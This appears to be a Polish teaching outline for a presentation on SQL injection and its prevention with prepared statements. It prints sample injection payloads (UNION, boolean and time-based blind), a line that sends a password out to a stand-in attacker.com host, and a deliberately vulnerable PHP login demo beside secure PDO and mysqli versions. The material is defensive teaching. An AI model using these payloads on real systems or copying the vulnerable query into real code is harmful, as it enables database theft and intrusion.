Co przekazesz słuchaczom?
Słuchacze zrozumieja, na czym polega atak SQL Injection, dlaczego jest jednym z najgroźniejszych zagrożeń dla aplikacji webowych, oraz jak się przed nim chronić za pomoca prepared statements. Poznaja różnicę miedzy niebezpiecznym a bezpiecznym kodem.
Mieszanie kodu i danych w jednym stringu
SQL Injection wystepuje, gdy dane od użytkownika sa bezposrednio wstawiane do zapytania SQL bez odpowiedniego zabezpieczenia. Atakujacy może wstrzyknac własne polecenia SQL.
// NIEBEZPIECZNY KOD - przykład do prezentacji$username = $_POST['username'];$query = "SELECT * FROM users WHERE username = '$username'";Jeśli użytkownik wpisze: ' OR '1'='1
Zapytanie staje się:
SELECT * FROM users WHERE username = '' OR '1'='1'To zapytanie zwroci WSZYSTKICH użytkowników!
Wyniki ataku widoczne bezposrednio w odpowiedzi:
UNION-based:
-- Atakujacy wpisuje w polu wyszukiwania:' UNION SELECT username, password FROM users--
-- Zapytanie staje się:SELECT name, price FROM products WHERE name = ''UNION SELECT username, password FROM users--'Error-based:
Brak bezposrednich wynikow - atakujacy “pyta” baze:
Boolean-based:
-- Pytanie: Czy pierwszy znak hasła admina to 'a'?' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE id=1)='a'--
-- Jeśli strona laduje się normalnie - TAK-- Jeśli błąd/inna odpowiedz - NIETime-based:
-- Pytanie z opoznieniem' AND IF(1=1, SLEEP(5), 0)--
-- Jeśli odpowiedz trwa 5 sekund - warunek prawdziwyAtakujacy może odzyskac cała baze, znak po znaku!
Dane wysyłane na zewnętrzny serwer:
-- Wyslij dane na serwer atakujacego' UNION SELECT LOAD_FILE(CONCAT('\\\\', (SELECT password FROM users LIMIT 1), '.attacker.com\\a'))--Kradzież danych
Modyfikacja danych
Usuniecie danych
Przejecie systemu
Bezpieczne zapytania z parametrami:
<?php// Połączenie z baza przez PDO$pdo = new PDO('mysql:host=localhost;dbname=app', 'user', 'pass');$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// BEZPIECZNE - prepared statement$stmt = $pdo->prepare('SELECT * FROM users WHERE username = :username');$stmt->execute(['username' => $_POST['username']]);$user = $stmt->fetch();
// Alternatywna składnia z ?$stmt = $pdo->prepare('SELECT * FROM users WHERE username = ? AND active = ?');$stmt->execute([$_POST['username'], 1]);Dlaczego to działa:
Prepared statements w mysqli:
<?php$mysqli = new mysqli('localhost', 'user', 'pass', 'app');
// Prepared statement$stmt = $mysqli->prepare('SELECT * FROM users WHERE username = ?');$stmt->bind_param('s', $_POST['username']); // 's' = string$stmt->execute();$result = $stmt->get_result();$user = $result->fetch_assoc();Typy parametrow:
s - stringi - integerd - doubleb - blobNiebezpieczny vs bezpieczny kod:
<?php$username = $_POST['username'];
// ZLE - konkatenacja$query = "SELECT * FROM users WHERE username = '$username'";$result = $pdo->query($query);
// ZLE - interpolacja$query = "SELECT * FROM users WHERE username = \"$username\"";$result = $pdo->query($query);
// DOBRZE - prepared statement$stmt = $pdo->prepare('SELECT * FROM users WHERE username = ?');$stmt->execute([$username]);$result = $stmt->fetch();Zasada: Jeśli widzisz zmienne w stringu SQL - to błąd!
Diagram pokazujacy:
Prosty przykład:
Oczekiwane: SELECT * FROM users WHERE name = 'Jan'Atak: SELECT * FROM users WHERE name = '' OR '1'='1' ^^^^^^^^^^^^^^ Wstrzykniety kod!Diagram dwuetapowy:
SELECT * FROM users WHERE name = ? (struktura)Ikony z opisami:
' OR '1'='1<?php// PODATNY KOD - tylko do demonstracji!$pdo = new PDO('mysql:host=localhost;dbname=demo', 'root', '');
if ($_SERVER['REQUEST_METHOD'] === 'POST') { $username = $_POST['username']; $password = $_POST['password'];
// NIEBEZPIECZNE! $query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'"; echo "<pre>Zapytanie: $query</pre>";
$result = $pdo->query($query); $user = $result->fetch();
if ($user) { echo "<h2>Zalogowano jako: " . htmlspecialchars($user['username']) . "</h2>"; } else { echo "<h2>Błędne dane logowania</h2>"; }}?><form method="POST"> <input name="username" placeholder="Username"><br> <input name="password" type="password" placeholder="Password"><br> <button>Login</button></form><?php// BEZPIECZNY KOD$pdo = new PDO('mysql:host=localhost;dbname=demo', 'root', '');$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
if ($_SERVER['REQUEST_METHOD'] === 'POST') { $username = $_POST['username']; $password = $_POST['password'];
// BEZPIECZNE - prepared statement $stmt = $pdo->prepare('SELECT * FROM users WHERE username = ? AND password = ?'); $stmt->execute([$username, $password]); $user = $stmt->fetch();
if ($user) { echo "<h2>Zalogowano jako: " . htmlspecialchars($user['username']) . "</h2>"; } else { echo "<h2>Błędne dane logowania</h2>"; }}?><form method="POST"> <input name="username" placeholder="Username"><br> <input name="password" type="password" placeholder="Password"><br> <button>Login</button></form>' UNION SELECT username, password FROM users--Wymagania minimalne:
Wymagania rozszerzone:
Wymagania zaawansowane:
Pytanie 1
Dlaczego prepared statements sa odporne na SQL Injection?
Pytanie 2
Czy walidacja danych wejsciowych (np. sprawdzenie czy to liczba) wystarczy jako ochrona?
Pytanie 3
Co to jest zasada “least privilege” i jak pomaga w ograniczeniu skutkow ataku?
Pytanie 4
Jak chronić dynamiczne nazwy kolumn w zapytaniach ORDER BY?
Prepared Statements
Zawsze uzywaj parametryzowanych zapytan. To podstawowa i najważniejsza obrona.
Walidacja wejscia
Sprawdzaj typy i format danych. Liczba powinna być liczba, email powinien być e-mailem.
Least Privilege
Aplikacja powinna mieć minimalne uprawnienia. Tylko SELECT, INSERT, UPDATE, DELETE - nie DROP, CREATE.
Ukrywanie błędów
Na produkcji nie pokazuj komunikatow o błędach SQL. Loguj je, ale nie wyswietlaj.